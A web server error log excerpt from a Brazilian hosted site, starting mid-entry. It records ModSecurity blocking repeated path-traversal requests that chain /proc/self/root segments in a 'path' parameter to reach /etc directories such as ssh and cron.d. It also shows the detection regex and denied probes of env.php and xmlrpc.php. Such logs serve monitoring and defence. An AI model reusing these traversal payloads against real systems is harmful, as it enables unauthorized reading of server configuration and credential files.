"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUhO82sZHvlq4xgHrHmAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:18:05.302157 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.241.46:42416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUje82sZHvlq4xgHrHmgAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:18:19.137588 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.243.203:37348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUm64xEDsg_V3ESNY3_QAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:18:47.499719 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:39350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUt-82sZHvlq4xgHrHuQAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:18:48.746968 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:58978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUuDarLhPAjZGI1b2y6wAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:18:54.967230 2026] [:error] [pid 18709:tid 140411658000128] [client 74.7.228.16:59182] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablUvjarLhPAjZGI1b2y9gAAA4o"]
[Tue Mar 17 10:19:06.707112 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.243.203:58980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUypqmL8PQht4WJFlM3wAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:19:10.248745 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:43228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUzpqmL8PQht4WJFlM4gAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:19:12.683263 2026] [access_compat:error] [pid 1731:tid 140411607643904] [client 185.177.72.38:51532] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/env.php
[Tue Mar 17 10:19:14.370686 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.244.31:59492] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablU0geiSKl8TjouI-YGvwAAA8o"]
[Tue Mar 17 10:19:51.995986 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.243.203:42436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablU9-82sZHvlq4xgHrH6wAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:20:03.657158 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:52450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVAat8Nd0UC_OcbVGz2wAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:20:06.472793 2026] [access_compat:error] [pid 2473:tid 140411624429312] [client 149.22.83.198:61225] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:20:06.475095 2026] [access_compat:error] [pid 17965:tid 140411666392832] [client 149.22.83.198:61226] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:20:07.555501 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:46036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVB-82sZHvlq4xgHrH8wAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:20:12.355318 2026] [:error] [pid 18604:tid 140411725141760] [client 74.7.243.203:46052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVDEBd0UqwxWindINstgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:20:15.118832 2026] [access_compat:error] [pid 1016:tid 140411582465792] [client 149.22.83.198:61451] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:20:15.120497 2026] [access_compat:error] [pid 1016:tid 140411590858496] [client 149.22.83.198:61452] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:20:19.211624 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:49068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVE5qmL8PQht4WJFlM8QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:20:26.268508 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:43484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVGgeiSKl8TjouI-YG1wAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:20:28.720974 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:43500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVHKBJNF7axNlVR0UBrgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:20:31.108896 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:43504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVH6BJNF7axNlVR0UBsQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:20:58.505908 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:51770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVOtCmCSWTlPouqorRAQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:21:05.434942 2026] [:error] [pid 18604:tid 140411733534464] [client 74.7.243.203:57272] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVQUBd0UqwxWindINs0QAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:21:08.975642 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:36828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVRK4xEDsg_V3ESNY4UwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:21:11.344098 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:40728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVR9CmCSWTlPouqorREAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:21:14.843449 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:40738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVSgb2qCuy5irgBMjNqQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:22:35.880615 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:40748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVm-82sZHvlq4xgHrIUgAAAo0"], referer: 